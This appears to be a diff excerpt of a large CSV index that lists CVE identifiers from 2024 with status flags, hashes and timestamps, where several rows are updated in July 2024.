CVE-2024-4062,0,0,695b7b6d53140e91ee1c447f6f5acafad0b73fbbd2558cb89ae9d4c0c7616ec0,2024-06-04T19:20:29.007000
CVE-2024-40624,0,0,4a20911ba5017c22f7067e7eea43b4f5d49d24af0046266156676a49862c806b,2024-07-16T13:43:58.773000
@ -255418,8 +255428,8 @@ CVE-2024-41005,0,0,95f568882fd1e16260f486a6121f76b4a7b47a9225c03cbcf7d46d652c71f
CVE-2024-41006,0,0,58bd6c502a79651b26621eacf2c0dc46dab924e02809c912fba2631a5541c0df,2024-07-12T16:34:58.687000
CVE-2024-41007,0,0,0f7451f1f6e903e68c19bb8e4507bcc8b91d7d8b575b739ec33e4181b2fd01a7,2024-07-15T13:00:34.853000
CVE-2024-41008,0,0,44accff6edd09848f65c4ea30c272c9f4e4cafd7e8013f5ed231ff575ad7b53e,2024-07-16T13:43:58.773000
CVE-2024-41009,1,1,e5b81427b73a7a659ab3d92e9b0d7880f34e9bf363b4b23d516646ecfbf7861a,2024-07-17T07:15:01.973000
CVE-2024-41010,1,1,b1691e45737b2b208a2830f3341ef6e6a5b6991a3b7c35dc85fb1a3a07095eb6,2024-07-17T07:15:02.183000
CVE-2024-41009,0,0,e5b81427b73a7a659ab3d92e9b0d7880f34e9bf363b4b23d516646ecfbf7861a,2024-07-17T07:15:01.973000
CVE-2024-41010,0,0,b1691e45737b2b208a2830f3341ef6e6a5b6991a3b7c35dc85fb1a3a07095eb6,2024-07-17T07:15:02.183000
CVE-2024-4102,0,0,1b0aaa7efbf772a3034d5138f2cde018af6a8f41a0229b0c5f36e4d66092a2a3,2024-07-09T18:19:14.047000
CVE-2024-4103,0,0,ff27f3988e30e41f465bfc5b7800f7ae2f96b1e2cd71c1414de16617b75fe4fe,2024-05-14T16:11:39.510000
CVE-2024-4104,0,0,069e7afb1610585640d00d566d3fc4756dff3571ed269cd2ef1d63c8e8ce45e5,2024-05-14T16:11:39.510000
@ -256400,11 +256410,11 @@ CVE-2024-5245,0,0,8367cc316d7fd622697ed020483e2edc6264aea8aa776978b7228518baa317
CVE-2024-5246,0,0,481ebf23b779dd3e32e9e0cda77aaee7d0bfc9eca82266cde6c77415f4c9c730,2024-07-03T02:08:44.767000
CVE-2024-5247,0,0,fdfe6c1388c42f602cdcb0ffda38b56b5f1ed960e60bfada435f42d294b2956e,2024-05-24T01:15:30.977000
CVE-2024-5248,0,0,2c3e52f7d10efa84a65c2d56e808c7c6b6e082b4d0e6c7b1b0a814f5918d2bf2,2024-06-07T14:56:05.647000
CVE-2024-5251,1,1,ba3d2c0f12a0aad18985c34197dfb5c6f863f2d1e893878b1f224a89df5cde00,2024-07-17T07:15:02.260000
CVE-2024-5252,1,1,37756dffba5d6bea70d1c95fddbd7f3af71cbff02ac71c7267e8e00c27d1d747,2024-07-17T07:15:02.483000
CVE-2024-5253,1,1,419a036fdbe28fd90488f2a8ac36952ccbed00272c62d9610ceb07cdd772123a,2024-07-17T07:15:02.690000
CVE-2024-5254,1,1,3d10c9b130bb6e37beefe49df8fbb12e54bbf8fbc808a8d229669162c22546c6,2024-07-17T07:15:02.883000
CVE-2024-5255,1,1,5ca464b4e7b83fa9891b4810da9d3130521e6735749a82e6d1faf0587e2a8362,2024-07-17T07:15:03.073000
CVE-2024-5251,0,0,ba3d2c0f12a0aad18985c34197dfb5c6f863f2d1e893878b1f224a89df5cde00,2024-07-17T07:15:02.260000
CVE-2024-5252,0,0,37756dffba5d6bea70d1c95fddbd7f3af71cbff02ac71c7267e8e00c27d1d747,2024-07-17T07:15:02.483000
CVE-2024-5253,0,0,419a036fdbe28fd90488f2a8ac36952ccbed00272c62d9610ceb07cdd772123a,2024-07-17T07:15:02.690000
CVE-2024-5254,0,0,3d10c9b130bb6e37beefe49df8fbb12e54bbf8fbc808a8d229669162c22546c6,2024-07-17T07:15:02.883000
CVE-2024-5255,0,0,5ca464b4e7b83fa9891b4810da9d3130521e6735749a82e6d1faf0587e2a8362,2024-07-17T07:15:03.073000
CVE-2024-5256,0,0,7546c1517da1882e18d942ab700b65cdd397cd67565c940d6efb24b85fa1c2bd,2024-06-07T14:56:05.647000
CVE-2024-5257,0,0,e4fba0a5c9dc635ae9582dcee356a08c90165a6e8c8a0a01b6dfbef5e885cd24,2024-07-12T16:54:34.517000
CVE-2024-5258,0,0,51134eb56f05332c584317818ff995de56b2de598a9752cb1990f31f73c535e3,2024-05-24T01:15:30.977000
@ -256666,6 +256676,7 @@ CVE-2024-5573,0,0,250942dd398584b07af081969c90c51eb870e472776aa0a5f143054241cd8a
CVE-2024-5574,0,0,e718295307eca06b04fb56f70dfb8daf0ce4b10163936e86fc3b21a6f71a4423,2024-06-20T12:44:01.637000
CVE-2024-5575,0,0,0d0faeec0f613a9625ccc8cb2724627ce688cebf183de5add4fa7e9fd84a3054,2024-07-15T13:00:34.853000
CVE-2024-5577,0,0,5dd16baf94f18e7abae39f40d89c75af3dba9492f2b1af50e3d8516c5413b1e4,2024-06-17T12:42:04.623000
CVE-2024-5582,1,1,bda1b1adad5ca655f44a526dc76a413b3ed087946a37e2dd235f07db40a34651,2024-07-17T08:15:02.180000
CVE-2024-5584,0,0,7705ff7ae1b4fd1342d12756cedf379ac85bb5a3b8398b6b986f5e220e43afde,2024-06-11T13:54:12.057000
CVE-2024-5585,0,0,9e089b029f69ddc50638e027531ef06d5e8acf986dd2efdfe6f9d39673e035c3,2024-06-13T04:15:17.407000
CVE-2024-5587,0,0,6b9958828217f46ad00f93a8982028b537e303232ee58bb83f00389806575abd,2024-06-03T14:46:24.250000
@ -256754,6 +256765,7 @@ CVE-2024-5699,0,0,c6a42ec507c58416dc30ca6ed956f1ded247800b2c9b3cf1e9a175eb88ff9b
CVE-2024-5700,0,0,75281b3d92ab48138fa84376c62cf06e3b235ecbf0492685b83c4b5de8ec6545,2024-07-03T02:09:12.470000
CVE-2024-5701,0,0,50132399b0866a3a39154eec031eecee61c5e1b87964f02e5d6e5dcb69b1128f,2024-06-11T13:54:12.057000
CVE-2024-5702,0,0,38c1097fef455f8c14a4a11698b056f16759fa186a63b78823c287fecdc7ce07,2024-06-19T10:15:11.583000
CVE-2024-5703,1,1,9706e49d4615235ada62fb6d426611eb128f3510e8f9c0c65bd057b8fd0fc817,2024-07-17T08:15:02.370000
CVE-2024-5704,0,0,be55689131fc57547da71e8726572a7a1a86cf57932558d33666ec0b15eef9b9,2024-07-09T18:19:14.047000
CVE-2024-5710,0,0,bbba5caf4cb4f465fb2a1f44424b7af778bd56d5f1b17eb3b38248b8a0397322,2024-07-01T10:15:30.183000
CVE-2024-5711,0,0,463604f6d6d272196433a5bb7494f0542e749e8811ac98ab1c08049581f8b425,2024-07-11T21:15:12.787000
@ -256958,7 +256970,7 @@ CVE-2024-6025,0,0,2653befc93f455636e57cde83404a5ff884ae434fc80abd19f04944c84a702
CVE-2024-6026,0,0,2970248e3866f379267d0cae7e3b9bb934f39b25cb3198f3dfbaa23423c08ff9,2024-07-12T16:55:44.240000
CVE-2024-6027,0,0,d36139a3f6402ad17d96a83c3d61f6ce213e515812c77112f328495c0bcd9928,2024-06-24T19:17:50.240000
CVE-2024-6028,0,0,a068f17d13f3176b06fe0181735235198b8a42900e26e5af12021baf09b50c20,2024-06-25T12:24:17.873000
CVE-2024-6033,1,1,15c25de796ebfbab9e44a812131dc54f93a03e716bec334742145fa1535f6aae,2024-07-17T07:15:03.263000
CVE-2024-6033,0,0,15c25de796ebfbab9e44a812131dc54f93a03e716bec334742145fa1535f6aae,2024-07-17T07:15:03.263000
CVE-2024-6035,0,0,71705709079183c78c8ed383ff1dde0d9a61df1fcd0014b5485dcff6ce00c8bd,2024-07-15T18:15:05.840000
CVE-2024-6036,0,0,ec75d3b088377f3e157bda1807d973db13644b79a58ce7816702ab31b3d039ce,2024-07-11T13:05:54.930000
CVE-2024-6037,0,0,6693b31ec7c6312863697d20bd04a1bdff52b0f0104cd13eb0277621b822579c,2024-07-11T13:05:54.930000
@ -256970,7 +256982,7 @@ CVE-2024-6043,0,0,9a8214fcd16bf01d325c97e688ae6245e010f64d01a5df33ef8c749a0d5352
CVE-2024-6044,0,0,4f21043ce144607b18656c689e724820f609703d237d24dbe17227d3f52b49e9,2024-06-17T12:42:04.623000
CVE-2024-6045,0,0,efe3be755dfb936847ff2e63b0d55993a7f058e00e5d0482b37d4da99ee94266,2024-06-17T12:42:04.623000
CVE-2024-6046,0,0,7dad2a883b5a6da9c2e106a85fbceea037db3e317153d640ef723443f1cc0680,2024-06-18T11:15:52.513000
CVE-2024-6047,0,0,64cbd7bb00dd96a251d35b437434b06509bf45d7928521d6c8dc9260967706f3,2024-06-17T14:15:13.040000
CVE-2024-6047,0,1,3a90a77d82081ca792239f937c9e32a45aca8eadbd9fe3df9a38e907e2ab40c9,2024-07-17T08:15:02.570000
CVE-2024-6048,0,0,c67416098261daba4fbb7cd933140c3939f890be764cfd8ea2022f29e8208654,2024-06-17T12:42:04.623000
CVE-2024-6050,0,0,af0f9fc577c3e44fa6616ba0473858c6a88d9ea48cff0078f9cf415e610d9fc1,2024-07-01T16:37:39.040000
CVE-2024-6052,0,0,9d100b5523a4d1cbcdb510a0143b4a10e19adddd8504e766934ce961d6d1c643,2024-07-12T13:15:21.680000
@ -257086,6 +257098,7 @@ CVE-2024-6215,0,0,720f1739703095287552164316882a6b926c156c15e89c7dc7084a2a8b1f11
CVE-2024-6216,0,0,99a638bb9b091862ee1125e5c2af18142e9f2a446dc1f5e54add6d69d774b8bc,2024-06-24T20:15:11.177000
CVE-2024-6217,0,0,caeef107ec037a20535b69bf461e75c9da91ce4fd887edb01336f60c235444b1,2024-06-21T11:22:01.687000
CVE-2024-6218,0,0,3cb8a30d4ddfe61bdea61d401bfb5f7d243e9ab40309c0377a9f4fcd89ff6826,2024-06-21T15:15:16.547000
CVE-2024-6220,1,1,0f2fb7730cf82d192a68e0e93d4a2014d253ff648c0c5f39b2e26f9e11aa8ac6,2024-07-17T08:15:02.730000
CVE-2024-6222,0,0,7da69ce6fbc5989cf8dc00c0967cc47c0670f03447330ea36d4de40ed4ce08ae,2024-07-12T17:05:39.070000
CVE-2024-6225,0,0,510a69cec2d5d6c6d036e0951030f27f3f34bcc77e3448a2bbf2dbc18120fe93,2024-06-24T19:21:28.450000
CVE-2024-6227,0,0,6448b237469b4af8add5bea6ce3efd3ec79e9126dca5090705d4ceeb86be54e2,2024-07-09T18:19:14.047000
@ -257227,7 +257240,7 @@ CVE-2024-6461,0,0,86a214d0c7bd3f57cea37cd567b01f1a0e55f8d4342f6c7c46fd15b8942c8d
CVE-2024-6463,0,0,f8d7d80ca565804c0caafdbc8214fe1eca7dc83d43861affc813af07365c0cc0,2024-07-03T21:15:04.640000
CVE-2024-6464,0,0,8fab89d1b3aef32a257cf0d7fb909cce6ac18d5ef8dc898bb9f0cc6c52356cbf,2024-07-03T21:15:04.697000
CVE-2024-6465,0,0,1a52d419caf12d1d223520a109b2aa019665792454012b51a06898ed38739a48,2024-07-15T13:00:34.853000
CVE-2024-6467,1,1,83ea8485c4f51411157c8a01fb9be399a5fe9907669d9a8fad6b15129616725c,2024-07-17T07:15:03.493000
CVE-2024-6467,0,0,83ea8485c4f51411157c8a01fb9be399a5fe9907669d9a8fad6b15129616725c,2024-07-17T07:15:03.493000
CVE-2024-6468,0,0,35510ca663346ec39c4261a703db141288708f1a8a294ff4bff13dfd2b2ac57d,2024-07-12T12:49:11.340000
CVE-2024-6469,0,0,8a9cc14cdc15687cebe1f067587bd279bfc289daac6283040462018576c0d534,2024-07-05T17:09:54.870000
CVE-2024-6470,0,0,c9a33c23ec7370c50b4df58ad71ec5e181cf8d29947a984c43804e0a58dc7723,2024-07-05T12:55:51.367000
@ -257300,11 +257313,11 @@ CVE-2024-6650,0,0,389479cac037eb791bf22f3727c10e60384d8e28492bfb0d0b7873c538245d
CVE-2024-6652,0,0,32c4914a2885b2299fef5292f9b5b00052aaeaf4b92ba53d869ce14f17c7c595,2024-07-11T13:05:54.930000
CVE-2024-6653,0,0,d93d31cbf15b722e8213bd0a1f350049b73a325a73fea026c81bdae5013a3c4f,2024-07-11T13:15:10.147000
CVE-2024-6655,0,0,0485248ee98682a7d1526979650a74114bd662162c8fc1626488ee79436e31bf,2024-07-16T18:00:02.110000
CVE-2024-6660,1,1,8420d82493fd4a45d30ce8c67e0a72efbb8840ded71fe90edd6bf51e51d65ad1,2024-07-17T07:15:03.683000
CVE-2024-6660,0,0,8420d82493fd4a45d30ce8c67e0a72efbb8840ded71fe90edd6bf51e51d65ad1,2024-07-17T07:15:03.683000
CVE-2024-6663,0,0,7facb2637e12709d4a455340194f194dba2537cb44d31c2262ed1aa6b9ebcf89,2024-07-10T21:15:11.463000
CVE-2024-6664,0,0,7dcdbd9efac1143da422ef778b0a605b2e75ff3874c65ca5b8e519e1d8523278,2024-07-10T21:15:11.520000
CVE-2024-6666,0,0,6ade2353732c66fc20367582756530c33ec26bf7f6989700bd337bd969227f22,2024-07-12T16:46:48.387000
CVE-2024-6669,1,1,61a6470650ec4ecffd67c04da2ad00a814e79b0427dcfaa8a7c533cc93f27a07,2024-07-17T07:15:03.873000
CVE-2024-6669,0,0,61a6470650ec4ecffd67c04da2ad00a814e79b0427dcfaa8a7c533cc93f27a07,2024-07-17T07:15:03.873000
CVE-2024-6676,0,0,b617e99f4ff839e117300b1a5f3c494dc1ceb13864a576e2b1519c7ec5960d34,2024-07-11T13:05:54.930000
CVE-2024-6677,0,0,d8004a1441e952f05633a34727a4f9223ac5077c2123fd1507a1955287de18f3,2024-07-12T12:49:07.030000
CVE-2024-6679,0,0,193698b3a519c2de1af0fd23f7e404e2d54c730e4704d97d0092b63ef1c81272,2024-07-11T18:09:58.777000

Can't render this file because it is too large.